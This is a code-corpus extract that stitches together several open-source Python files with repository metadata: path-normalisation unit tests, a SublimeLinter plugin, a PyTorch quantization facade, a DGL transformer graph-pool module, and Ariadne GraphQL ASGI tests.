self.assertEqual(p.fslash(), "/a/c")
def test_path_collapses_many_single_dots(self):
p = Path("/a/b/./c/././d")
self.assertEqual(p.fslash(), "/a/b/c/d")
def test_path_collapses_many_consecutive_double_dots(self):
p = Path("/a/b/c/../../d")
self.assertEqual(p.fslash(), "/a/d")
def test_path_collapses_many_non_consecutive_double_dots(self):
p = Path("/a/b/c/../../d/../e/f/../g")
self.assertEqual(p.fslash(), "/a/e/g")
def test_path_collapses_many_non_consecutive_mixed_dots(self):
p = Path("/a/./b/c/../.././d/../././e/f/../g/./")
self.assertEqual(p.fslash(), "/a/e/g")
self.assertEqual(p.depth, 3)
def test_path_collapses_to_root(self):
p = Path("/a/b/../../")
self.assertEqual(p.fslash(), "/")
self.assertEqual(p.depth, 0)
def test_raise_when_collapse_too_many_dots(self):
with self.assertRaises(ValueError):
Path("/a/b/../../../")
class RelativePathCollapseDotsTest(unittest.TestCase):
def test_resolve_relative_several_dots(self):
p = Path("./a/b/../../../c/d")
self.assertEqual(p.fslash(), "../c/d")
self.assertEqual(p.all_components, ["..", "c", "d"])
self.assertEqual(p.depth, 3)
def test_resolve_leading_relative_dots(self):
p = Path("../c/d")
self.assertEqual(p.fslash(), "../c/d")
def test_resolve_leading_relative_dots(self):
p = Path("../../../c/d")
self.assertEqual(p.fslash(), "../../../c/d")
def test_resolve_only_relative_dots(self):
p = Path("../../../")
self.assertEqual(p.fslash(), "../../../")
def test_collapse_contained_components(self):
p = Path("../../../a/b/../../../")
self.assertEqual(p.fslash(), "../../../../")
def test_remove_trailing_dot(self):
p = Path("../../.././")
self.assertEqual(p.fslash(), "../../../")
def test_cwd(self):
p = Path(".")
self.assertEqual(p.fslash(), "./")
def test_down_up_cwd(self):
p = Path("a/..")
self.assertEqual(p.fslash(), "./")
def test_up_down_sibling(self):
p = Path("../a")
self.assertEqual(p.fslash(), "../a")
def test_up_down_sibling_bslash(self):
p = Path("../a")
self.assertEqual(p.bslash(), "..\\a")
class PathComponentsTest(unittest.TestCase):
def test_path_gets_tail(self):
p = Path("/a/b/c")
self.assertEqual(p.tail, "c")
def test_path_gets_none_when_no_tail(self):
p = Path("/")
self.assertEqual(p.tail, None)
def test_path_ends_with(self):
p = Path("/a/b/cdef")
self.assertTrue(p.endswith("ef"))
def test_path_not_ends_with(self):
p = Path("/a/b/cdef")
self.assertFalse(p.endswith("eg"))
class RelativePathTest(unittest.TestCase):
def test_rel_path_does_not_raise(self):
p = Path("a/b/c")
self.assertEqual(p.fslash(), "a/b/c")
class EqualityTests(unittest.TestCase):
def test_paths_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/c")
self.assertTrue(p1 == p2)
def test_same_object_equal(self):
p1 = Path("a/b/c")
self.assertTrue(p1 == p1)
def test_different_paths_equal_false(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertFalse(p1 == p2)
def test_paths_not_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertTrue(p1 != p2)
class InitializeWithComponentsTests(unittest.TestCase):
def test_initialize_with_lettered_components(self):
p = Path(["C:", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "C:/a/b/c")
def test_initialize_with_backslash_unc_components(self):
p = Path(["\\", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_fwslash_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "\\\\a\\b\\c")
def test_initialize_with_relative_components(self):
p = Path(["a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "a\\b\\c")
def test_initialize_with_relative_components_is_relative(self):
p = Path(["a", "b", "c"])
self.assertTrue(p.relative)
self.assertFalse(p.absolute)
class GetComponentsTests(unittest.TestCase):
def test_get_all_components(self):
p = Path("/a/b/c")
self.assertEqual(p.all_components, ["a", "b", "c"])
def test_get_all_components_with_drive(self):
p = Path("C:/a/b/c")
self.assertEqual(p.all_components, ["C:", "a", "b", "c"])
def test_get_all_components_with_unc_fwslash(self):
p = Path("//a/b/c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
def test_get_all_components_with_unc_backslash(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
class UNCTests(unittest.TestCase):
def test_unc_root_with_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_unc_is_absolute(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.absolute)
def test_unc_root_without_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=False), "/a/b/c")
def test_unc_root_with_forward(self):
p = Path("//a/b/c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_is_unc(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.is_unc)
p = Path("//a/b/c")
self.assertTrue(p.is_unc)
def test_posix_abs_is_not_unc(self):
p = Path(["/a/b/c"])
self.assertFalse(p.is_unc)
def test_relative_is_not_unc(self):
p = Path(["a/b/c"])
self.assertFalse(p.is_unc)
def test_drive_letter_is_not_unc(self):
p = Path("C:\\aaa\\bbb\\c")
self.assertFalse(p.is_unc)
if __name__ == "__main__":
unittest.main()
| 32.620614
| 93
| 0.604034
| 14,379
| 0.966655
| 0
| 0
| 0
| 0
| 0
| 0
| 2,547
| 0.171227
|
b188abfaae0783909143fd3975f59d921af7acbd
| 3,513
|
py
|
Python
|
linter.py
|
KidkArolis/SublimeLinter-contrib-healthier
|
5b912af5f9afca85de86d709c46d3e566057823f
|
[
"MIT"
] | null | null | null |
linter.py
|
KidkArolis/SublimeLinter-contrib-healthier
|
5b912af5f9afca85de86d709c46d3e566057823f
|
[
"MIT"
] | 3
|
2019-01-25T15:21:38.000Z
|
2019-01-30T23:52:11.000Z
|
linter.py
|
KidkArolis/SublimeLinter-contrib-healthier
|
5b912af5f9afca85de86d709c46d3e566057823f
|
[
"MIT"
] | null | null | null |
"""This module exports the Healthier plugin class."""
import json
import logging
import re
import shlex
from SublimeLinter.lint import NodeLinter
logger = logging.getLogger('SublimeLinter.plugin.healthier')
class Healthier(NodeLinter):
"""Provides an interface to the healthier executable."""
# instead of using cmd feature of SublimeLinter
# we implement a custom run, that doesn't show error
# in the status bar in case a local healthier binary
# is not found
cmd = None
_cmd = 'healthier --format json --stdin'
line_col_base = (1, 1)
defaults = {
'selector': 'source.js - meta.attribute-with-value',
'disable_if_not_dependency': True
}
def run(self, cmd, code):
cmd = shlex.split(self._cmd)
cmd = self.build_cmd(cmd)
if not cmd:
return []
return self.communicate(cmd, code)
def on_stderr(self, stderr):
if (
'DeprecationWarning' in stderr
or 'ExperimentalWarning' in stderr
or 'in the next version' in stderr # is that a proper deprecation?
):
logger.warning(stderr)
else:
logger.error(stderr)
self.notify_failure()
def find_errors(self, output):
"""Parse errors from linter's output."""
try:
# It is possible that users output debug messages to stdout, so we
# only parse the last line, which is hopefully the actual healthier
# output.
# https://github.com/SublimeLinter/SublimeLinter-eslint/issues/251
last_line = output.rstrip().split('\n')[-1]
content = json.loads(last_line)
except ValueError:
logger.error(
"JSON Decode error: We expected JSON from 'healthier', "
"but instead got this:\n{}\n\n"
"Be aware that we only parse the last line of above "
"output.".format(output))
self.notify_failure()
return
if logger.isEnabledFor(logging.INFO):
import pprint
logger.info(
'{} output:\n{}'.format(self.name, pprint.pformat(content)))
for entry in content:
for match in entry['messages']:
if match['message'].startswith('File ignored'):
continue
column = match.get('column', None)
ruleId = match.get('ruleId', '')
if column is not None:
# apply line_col_base manually
column = column - 1
yield (
match,
match['line'] - 1, # apply line_col_base manually
column,
ruleId if match['severity'] == 2 else '',
ruleId if match['severity'] == 1 else '',
match['message'],
None # near
)
def reposition_match(self, line, col, m, vv):
match = m.match
if (
col is None
or 'endLine' not in match
or 'endColumn' not in match
):
return super().reposition_match(line, col, m, vv)
# apply line_col_base manually
end_line = match['endLine'] - 1
end_column = match['endColumn'] - 1
for _line in range(line, end_line):
text = vv.select_line(_line)
end_column += len(text)
return line, col, end_column
| 32.831776
| 79
| 0.545687
| 3,302
| 0.939937
| 1,729
| 0.492172
| 0
| 0
| 0
| 0
| 1,151
| 0.32764
|
b188c34a63c4e8f52180a384c6fb116f6a431c46
| 7,184
|
py
|
Python
|
model_compression_toolkit/gptq/pytorch/quantization_facade.py
|
ofirgo/model_optimization
|
18be895a35238df128913183b05e60550c2b6e6b
|
[
"Apache-2.0"
] | 42
|
2021-10-31T10:17:49.000Z
|
2022-03-21T08:51:46.000Z
|
model_compression_toolkit/gptq/pytorch/quantization_facade.py
|
ofirgo/model_optimization
|
18be895a35238df128913183b05e60550c2b6e6b
|
[
"Apache-2.0"
] | 6
|
2021-10-31T15:06:03.000Z
|
2022-03-31T10:32:53.000Z
|
model_compression_toolkit/gptq/pytorch/quantization_facade.py
|
ofirgo/model_optimization
|
18be895a35238df128913183b05e60550c2b6e6b
|
[
"Apache-2.0"
] | 18
|
2021-11-01T12:16:43.000Z
|
2022-03-25T16:52:37.000Z
|
# Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Callable
from model_compression_toolkit.core import common
from model_compression_toolkit.core.common import Logger
from model_compression_toolkit.core.common.constants import PYTORCH
from model_compression_toolkit.gptq.common.gptq_config import GradientPTQConfig
from model_compression_toolkit.core.common.target_platform import TargetPlatformCapabilities
from model_compression_toolkit.core.common.mixed_precision.kpi import KPI
from model_compression_toolkit.core.common.framework_info import FrameworkInfo
from model_compression_toolkit import CoreConfig
from model_compression_toolkit.core.common.mixed_precision.mixed_precision_quantization_config import \
MixedPrecisionQuantizationConfigV2
from model_compression_toolkit.core.common.post_training_quantization import post_training_quantization
import importlib
if importlib.util.find_spec("torch") is not None:
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from model_compression_toolkit.core.pytorch.constants import DEFAULT_TP_MODEL
from torch.nn import Module
from model_compression_toolkit import get_target_platform_capabilities
DEFAULT_PYTORCH_TPC = get_target_platform_capabilities(PYTORCH, DEFAULT_TP_MODEL)
def pytorch_gradient_post_training_quantization_experimental(in_module: Module,
representative_data_gen: Callable,
target_kpi: KPI = None,
core_config: CoreConfig = CoreConfig(),
fw_info: FrameworkInfo = DEFAULT_PYTORCH_INFO,
gptq_config: GradientPTQConfig = None,
target_platform_capabilities: TargetPlatformCapabilities = DEFAULT_PYTORCH_TPC):
"""
Quantize a trained Pytorch module using post-training quantization.
By default, the module is quantized using a symmetric constraint quantization thresholds
(power of two) as defined in the default TargetPlatformCapabilities.
The module is first optimized using several transformations (e.g. BatchNormalization folding to
preceding layers). Then, using a given dataset, statistics (e.g. min/max, histogram, etc.) are
being collected for each layer's output (and input, depends on the quantization configuration).
Thresholds are then being calculated using the collected statistics and the module is quantized
(both coefficients and activations by default).
If gptq_config is passed, the quantized weights are optimized using gradient based post
training quantization by comparing points between the float and quantized modules, and minimizing the
observed loss.
Args:
in_module (Module): Pytorch module to quantize.
representative_data_gen (Callable): Dataset used for calibration.
target_kpi (KPI): KPI object to limit the search of the mixed-precision configuration as desired.
core_config (CoreConfig): Configuration object containing parameters of how the model should be quantized, including mixed precision parameters.
fw_info (FrameworkInfo): Information needed for quantization about the specific framework (e.g., kernel channels indices, groups of layers by how they should be quantized, etc.). `Default PyTorch info <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/pytorch/default_framework_info.py>`_
gptq_config (GradientPTQConfig): Configuration for using gptq (e.g. optimizer).
target_platform_capabilities (TargetPlatformCapabilities): TargetPlatformCapabilities to optimize the PyTorch model according to. `Default PyTorch TPC <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/tpc_models/pytorch_tp_models/pytorch_default.py>`_
Returns:
A quantized module and information the user may need to handle the quantized module.
Examples:
Import a Pytorch module:
>>> import torchvision.models.mobilenet_v2 as models
>>> module = models.mobilenet_v2()
Create a random dataset generator:
>>> import numpy as np
>>> def repr_datagen(): return [np.random.random((1,224,224,3))]
Import mct and pass the module with the representative dataset generator to get a quantized module:
>>> import model_compression_toolkit as mct
>>> quantized_module, quantization_info = mct.pytorch_post_training_quantization(module, repr_datagen)
"""
if core_config.mixed_precision_enable:
if not isinstance(core_config.mixed_precision_config, MixedPrecisionQuantizationConfigV2):
common.Logger.error("Given quantization config to mixed-precision facade is not of type "
"MixedPrecisionQuantizationConfigV2. Please use pytorch_post_training_quantization API,"
"or pass a valid mixed precision configuration.")
common.Logger.info("Using experimental mixed-precision quantization. "
"If you encounter an issue please file a bug.")
return post_training_quantization(in_module,
representative_data_gen,
core_config,
fw_info,
PytorchImplementation(),
target_platform_capabilities,
gptq_config,
target_kpi=target_kpi)
else:
# If torch is not installed,
# we raise an exception when trying to use these functions.
def pytorch_gradient_post_training_quantization_experimental(*args, **kwargs):
Logger.critical('Installing Pytorch is mandatory '
'when using pytorch_gradient_post_training_quantization_experimental. '
'Could not find the torch package.')
| 60.369748
| 334
| 0.680122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,064
| 0.565702
|
b188f10ec381323c6265f65bdee66f4fcf49a96c
| 11,472
|
py
|
Python
|
transformer/dataset/graph.py
|
tmpaul06/dgl
|
8f458464b0e14c78978db4b91590e8ca718c5ec6
|
[
"Apache-2.0"
] | 1
|
2019-03-15T07:25:09.000Z
|
2019-03-15T07:25:09.000Z
|
transformer/dataset/graph.py
|
tmpaul06/dgl
|
8f458464b0e14c78978db4b91590e8ca718c5ec6
|
[
"Apache-2.0"
] | null | null | null |
transformer/dataset/graph.py
|
tmpaul06/dgl
|
8f458464b0e14c78978db4b91590e8ca718c5ec6
|
[
"Apache-2.0"
] | null | null | null |
import dgl
import torch as th
import numpy as np
import itertools
import time
from collections import *
Graph = namedtuple('Graph',
['g', 'src', 'tgt', 'tgt_y', 'nids', 'eids', 'nid_arr', 'n_nodes', 'n_edges', 'n_tokens', 'layer_eids'])
# We need to create new graph pools for relative position attention (ngram style)
def dedupe_tuples(tups):
try:
return list(set([(a, b) if a < b else (b, a) for a, b in tups]))
except ValueError:
raise Exception(tups)
def get_src_dst_deps(src_deps, order=1):
if not isinstance(src_deps, list):
src_deps = [src_deps]
# If order is one, then we simply return src_deps
if order == 1:
return list(set(src_deps))
else:
new_deps = list()
for src, dst in src_deps:
# Go up one order. i.e make dst the src, and find its parent
for src_dup, dst_dup in src_deps:
if dst_dup == dst and src != src_dup:
new_deps.append((src, src_dup))
elif src_dup == src and dst != dst_dup:
new_deps.append((dst, dst_dup))
elif dst == src_dup and src != dst_dup:
new_deps.append((src, dst_dup))
return list(set(get_src_dst_deps(new_deps, order=order - 1)).difference(set(src_deps)))
class GraphPool:
"Create a graph pool in advance to accelerate graph building phase in Transformer."
def __init__(self, n=50, m=50):
'''
args:
n: maximum length of input sequence.
m: maximum length of output sequence.
'''
print('start creating graph pool...')
tic = time.time()
self.n, self.m = n, m
g_pool = [[dgl.DGLGraph() for _ in range(m)] for _ in range(n)]
num_edges = {
'ee': np.zeros((n, n)).astype(int),
'ed': np.zeros((n, m)).astype(int),
'dd': np.zeros((m, m)).astype(int)
}
for i, j in itertools.product(range(n), range(m)):
src_length = i + 1
tgt_length = j + 1
g_pool[i][j].add_nodes(src_length + tgt_length)
enc_nodes = th.arange(src_length, dtype=th.long)
dec_nodes = th.arange(tgt_length, dtype=th.long) + src_length
# enc -> enc
us = enc_nodes.unsqueeze(-1).repeat(1, src_length).view(-1)
vs = enc_nodes.repeat(src_length)
g_pool[i][j].add_edges(us, vs)
num_edges['ee'][i][j] = len(us)
# enc -> dec
us = enc_nodes.unsqueeze(-1).repeat(1, tgt_length).view(-1)
vs = dec_nodes.repeat(src_length)
g_pool[i][j].add_edges(us, vs)
num_edges['ed'][i][j] = len(us)
# dec -> dec
indices = th.triu(th.ones(tgt_length, tgt_length)) == 1
us = dec_nodes.unsqueeze(-1).repeat(1, tgt_length)[indices]
vs = dec_nodes.unsqueeze(0).repeat(tgt_length, 1)[indices]
g_pool[i][j].add_edges(us, vs)
num_edges['dd'][i][j] = len(us)
print('successfully created graph pool, time: {0:0.3f}s'.format(time.time() - tic))
self.g_pool = g_pool
self.num_edges = num_edges
def beam(self, src_buf, start_sym, max_len, k, device='cpu', src_deps=None):
'''
Return a batched graph for beam search during inference of Transformer.
args:
src_buf: a list of input sequence
start_sym: the index of start-of-sequence symbol
max_len: maximum length for decoding
k: beam size
device: 'cpu' or 'cuda:*'
'''
if src_deps is None:
src_deps = list()
g_list = []
src_lens = [len(_) for _ in src_buf]
tgt_lens = [max_len] * len(src_buf)
num_edges = {'ee': [], 'ed': [], 'dd': []}
for src_len, tgt_len in zip(src_lens, tgt_lens):
i, j = src_len - 1, tgt_len - 1
for _ in range(k):
g_list.append(self.g_pool[i][j])
for key in ['ee', 'ed', 'dd']:
num_edges[key].append(int(self.num_edges[key][i][j]))
g = dgl.batch(g_list)
src, tgt = [], []
src_pos, tgt_pos = [], []
enc_ids, dec_ids = [], []
layer_eids = {
'dep': [[], []]
}
e2e_eids, e2d_eids, d2d_eids = [], [], []
n_nodes, n_edges, n_tokens = 0, 0, 0
for src_sample, src_dep, n, n_ee, n_ed, n_dd in zip(src_buf, src_deps, src_lens, num_edges['ee'], num_edges['ed'], num_edges['dd']):
for _ in range(k):
src.append(th.tensor(src_sample, dtype=th.long, device=device))
src_pos.append(th.arange(n, dtype=th.long, device=device))
enc_ids.append(th.arange(n_nodes, n_nodes + n, dtype=th.long, device=device))
n_nodes += n
e2e_eids.append(th.arange(n_edges, n_edges + n_ee, dtype=th.long, device=device))
# Copy the ids of edges that correspond to a given node and its previous N nodes
# We are using arange here. This will not work. Instead we need to select edges that
# correspond to previous positions. This information is present in graph pool
# For each edge, we need to figure out source_node_id and target_node_id.
if src_dep:
for i in range(0, 2):
for src_node_id, dst_node_id in dedupe_tuples(get_src_dst_deps(src_dep, i + 1)):
layer_eids['dep'][i].append(n_edges + src_node_id * n + dst_node_id)
layer_eids['dep'][i].append(n_edges + dst_node_id * n + src_node_id)
n_edges += n_ee
tgt_seq = th.zeros(max_len, dtype=th.long, device=device)
tgt_seq[0] = start_sym
tgt.append(tgt_seq)
tgt_pos.append(th.arange(max_len, dtype=th.long, device=device))
dec_ids.append(th.arange(n_nodes, n_nodes + max_len, dtype=th.long, device=device))
n_nodes += max_len
e2d_eids.append(th.arange(n_edges, n_edges + n_ed, dtype=th.long, device=device))
n_edges += n_ed
d2d_eids.append(th.arange(n_edges, n_edges + n_dd, dtype=th.long, device=device))
n_edges += n_dd
g.set_n_initializer(dgl.init.zero_initializer)
g.set_e_initializer(dgl.init.zero_initializer)
return Graph(g=g,
src=(th.cat(src), th.cat(src_pos)),
tgt=(th.cat(tgt), th.cat(tgt_pos)),
tgt_y=None,
nids = {'enc': th.cat(enc_ids), 'dec': th.cat(dec_ids)},
eids = {'ee': th.cat(e2e_eids), 'ed': th.cat(e2d_eids), 'dd': th.cat(d2d_eids)},
nid_arr = {'enc': enc_ids, 'dec': dec_ids},
n_nodes=n_nodes,
n_edges=n_edges,
layer_eids={
'dep': [
th.tensor(layer_eids['dep'][i]) for i in range(0, len(layer_eids['dep']))
]
},
n_tokens=n_tokens)
def __call__(self, src_buf, tgt_buf, device='cpu', src_deps=None):
'''
Return a batched graph for the training phase of Transformer.
args:
src_buf: a set of input sequence arrays.
tgt_buf: a set of output sequence arrays.
device: 'cpu' or 'cuda:*'
src_deps: list, optional
Dependency parses of the source in the form of src_node_id -> dst_node_id.
where src is the child and dst is the parent. i.e a child node attends on its
syntactic parent in a dependency parse
'''
if src_deps is None:
src_deps = list()
g_list = []
src_lens = [len(_) for _ in src_buf]
tgt_lens = [len(_) - 1 for _ in tgt_buf]
num_edges = {'ee': [], 'ed': [], 'dd': []}
# We are running over source and target pairs here
for src_len, tgt_len in zip(src_lens, tgt_lens):
i, j = src_len - 1, tgt_len - 1
g_list.append(self.g_pool[i][j])
for key in ['ee', 'ed', 'dd']:
num_edges[key].append(int(self.num_edges[key][i][j]))
g = dgl.batch(g_list)
src, tgt, tgt_y = [], [], []
src_pos, tgt_pos = [], []
enc_ids, dec_ids = [], []
e2e_eids, d2d_eids, e2d_eids = [], [], []
layer_eids = {
'dep': [[], []]
}
n_nodes, n_edges, n_tokens = 0, 0, 0
for src_sample, tgt_sample, src_dep, n, m, n_ee, n_ed, n_dd in zip(src_buf, tgt_buf, src_deps, src_lens, tgt_lens, num_edges['ee'], num_edges['ed'], num_edges['dd']):
src.append(th.tensor(src_sample, dtype=th.long, device=device))
tgt.append(th.tensor(tgt_sample[:-1], dtype=th.long, device=device))
tgt_y.append(th.tensor(tgt_sample[1:], dtype=th.long, device=device))
src_pos.append(th.arange(n, dtype=th.long, device=device))
tgt_pos.append(th.arange(m, dtype=th.long, device=device))
enc_ids.append(th.arange(n_nodes, n_nodes + n, dtype=th.long, device=device))
n_nodes += n
dec_ids.append(th.arange(n_nodes, n_nodes + m, dtype=th.long, device=device))
n_nodes += m
e2e_eids.append(th.arange(n_edges, n_edges + n_ee, dtype=th.long, device=device))
# Copy the ids of edges that correspond to a given node and its previous N nodes
# We are using arange here. This will not work. Instead we need to select edges that
# correspond to previous positions. This information is present in graph pool
# For each edge, we need to figure out source_node_id and target_node_id.
if src_dep:
for i in range(0, 2):
for src_node_id, dst_node_id in dedupe_tuples(get_src_dst_deps(src_dep, i + 1)):
layer_eids['dep'][i].append(n_edges + src_node_id * n + dst_node_id)
layer_eids['dep'][i].append(n_edges + dst_node_id * n + src_node_id)
n_edges += n_ee
e2d_eids.append(th.arange(n_edges, n_edges + n_ed, dtype=th.long, device=device))
n_edges += n_ed
d2d_eids.append(th.arange(n_edges, n_edges + n_dd, dtype=th.long, device=device))
n_edges += n_dd
n_tokens += m
g.set_n_initializer(dgl.init.zero_initializer)
g.set_e_initializer(dgl.init.zero_initializer)
return Graph(g=g,
src=(th.cat(src), th.cat(src_pos)),
tgt=(th.cat(tgt), th.cat(tgt_pos)),
tgt_y=th.cat(tgt_y),
nids = {'enc': th.cat(enc_ids), 'dec': th.cat(dec_ids)},
eids = {'ee': th.cat(e2e_eids), 'ed': th.cat(e2d_eids), 'dd': th.cat(d2d_eids)},
nid_arr = {'enc': enc_ids, 'dec': dec_ids},
n_nodes=n_nodes,
layer_eids={
'dep': [
th.tensor(layer_eids['dep'][i]) for i in range(0, len(layer_eids['dep']))
]
},
n_edges=n_edges,
n_tokens=n_tokens)
| 44.638132
| 174
| 0.539139
| 10,140
| 0.883891
| 0
| 0
| 0
| 0
| 0
| 0
| 2,363
| 0.20598
|
b189f5ce6dc38c0cbcc1102caf8a791a932e5870
| 12,747
|
py
|
Python
|
tests/asgi/test_configuration.py
|
mrmilu/ariadne
|
cba577bd4befd16e0ec22701a5ac68f719661a9a
|
[
"BSD-3-Clause"
] | 1
|
2020-05-28T01:48:58.000Z
|
2020-05-28T01:48:58.000Z
|
tests/asgi/test_configuration.py
|
mrmilu/ariadne
|
cba577bd4befd16e0ec22701a5ac68f719661a9a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/asgi/test_configuration.py
|
mrmilu/ariadne
|
cba577bd4befd16e0ec22701a5ac68f719661a9a
|
[
"BSD-3-Clause"
] | null | null | null |
# pylint: disable=not-context-manager
from unittest.mock import ANY, Mock
from starlette.testclient import TestClient
from ariadne.asgi import (
GQL_CONNECTION_ACK,
GQL_CONNECTION_INIT,
GQL_DATA,
GQL_ERROR,
GQL_START,
GraphQL,
)
from ariadne.types import Extension
def test_custom_context_value_is_passed_to_resolvers(schema):
app = GraphQL(schema, context_value={"test": "TEST-CONTEXT"})
client = TestClient(app)
response = client.post("/", json={"query": "{ testContext }"})
assert response.json() == {"data": {"testContext": "TEST-CONTEXT"}}
def test_custom_context_value_function_is_set_and_called_by_app(schema):
get_context_value = Mock(return_value=True)
app = GraphQL(schema, context_value=get_context_value)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_context_value.assert_called_once()
def test_custom_context_value_function_result_is_passed_to_resolvers(schema):
get_context_value = Mock(return_value={"test": "TEST-CONTEXT"})
app = GraphQL(schema, context_value=get_context_value)
client = TestClient(app)
response = client.post("/", json={"query": "{ testContext }"})
assert response.json() == {"data": {"testContext": "TEST-CONTEXT"}}
def test_async_context_value_function_result_is_awaited_before_passing_to_resolvers(
schema,
):
async def get_context_value(*_):
return {"test": "TEST-ASYNC-CONTEXT"}
app = GraphQL(schema, context_value=get_context_value)
client = TestClient(app)
response = client.post("/", json={"query": "{ testContext }"})
assert response.json() == {"data": {"testContext": "TEST-ASYNC-CONTEXT"}}
def test_custom_root_value_is_passed_to_query_resolvers(schema):
app = GraphQL(schema, root_value={"test": "TEST-ROOT"})
client = TestClient(app)
response = client.post("/", json={"query": "{ testRoot }"})
assert response.json() == {"data": {"testRoot": "TEST-ROOT"}}
def test_custom_root_value_is_passed_to_subscription_resolvers(schema):
app = GraphQL(schema, root_value={"test": "TEST-ROOT"})
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { testRoot }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
assert response["payload"] == {"data": {"testRoot": "TEST-ROOT"}}
def test_custom_root_value_function_is_called_by_query(schema):
get_root_value = Mock(return_value=True)
app = GraphQL(schema, root_value=get_root_value)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_root_value.assert_called_once()
def test_custom_root_value_function_is_called_by_subscription(schema):
get_root_value = Mock(return_value=True)
app = GraphQL(schema, root_value=get_root_value)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { ping }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
get_root_value.assert_called_once()
def test_custom_root_value_function_is_called_with_context_value(schema):
get_root_value = Mock(return_value=True)
app = GraphQL(
schema, context_value={"test": "TEST-CONTEXT"}, root_value=get_root_value
)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_root_value.assert_called_once_with({"test": "TEST-CONTEXT"}, ANY)
def test_custom_validation_rule_is_called_by_query_validation(schema, validation_rule):
app = GraphQL(schema, validation_rules=[validation_rule])
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
validation_rule.assert_called_once()
def test_custom_validation_rules_function_is_set_and_called_on_query_execution(
schema, validation_rule
):
get_validation_rules = Mock(return_value=[validation_rule])
app = GraphQL(schema, validation_rules=get_validation_rules)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_validation_rules.assert_called_once()
validation_rule.assert_called_once()
def test_custom_validation_rules_function_is_called_with_context_value(
schema, validation_rule
):
get_validation_rules = Mock(return_value=[validation_rule])
app = GraphQL(
schema,
context_value={"test": "TEST-CONTEXT"},
validation_rules=get_validation_rules,
)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_validation_rules.assert_called_once_with({"test": "TEST-CONTEXT"}, ANY, ANY)
def execute_failing_query(app):
client = TestClient(app)
client.post("/", json={"query": "{ error }"})
def test_default_logger_is_used_to_log_error_if_custom_is_not_set(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema)
execute_failing_query(app)
logging_mock.getLogger.assert_called_once_with("ariadne")
def test_custom_logger_is_used_to_log_query_error(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema, logger="custom")
execute_failing_query(app)
logging_mock.getLogger.assert_called_once_with("custom")
def test_custom_logger_is_used_to_log_subscription_source_error(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema, logger="custom")
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { sourceError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
logging_mock.getLogger.assert_called_once_with("custom")
def test_custom_logger_is_used_to_log_subscription_resolver_error(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema, logger="custom")
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { resolverError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
logging_mock.getLogger.assert_called_once_with("custom")
def test_custom_error_formatter_is_used_to_format_query_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
execute_failing_query(app)
error_formatter.assert_called_once()
def test_custom_error_formatter_is_used_to_format_subscription_syntax_error(schema):
error_formatter = Mock(return_value=True)
